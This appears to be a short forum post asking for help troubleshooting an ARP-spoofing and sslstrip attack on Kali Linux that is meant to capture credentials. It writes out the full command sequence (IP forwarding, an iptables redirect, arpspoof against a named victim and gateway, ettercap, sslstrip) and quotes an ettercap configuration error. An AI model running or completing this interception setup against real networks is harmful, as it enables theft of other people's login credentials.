Hi all,

Trying to run sslstrip by ettercap as follows to capture the creds on Kali:

# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -i eth0 -p tcp --d-port 80 -j REDIRECT --to-port 10000
# arpspoof -i eth0 -t 192.168.1.200 192.168.1.1
# ettercap -T -i eth0
# sslstrip -a


but ettercap while running gives alert: "SSL dissection needs a valid 'redir_command_on' script in the etter.conf file" and no creds captures.
Should I modify something in "ettercap.conf" file?..or anything wrong or missing with my configuration and procedure?

Thanks a lot,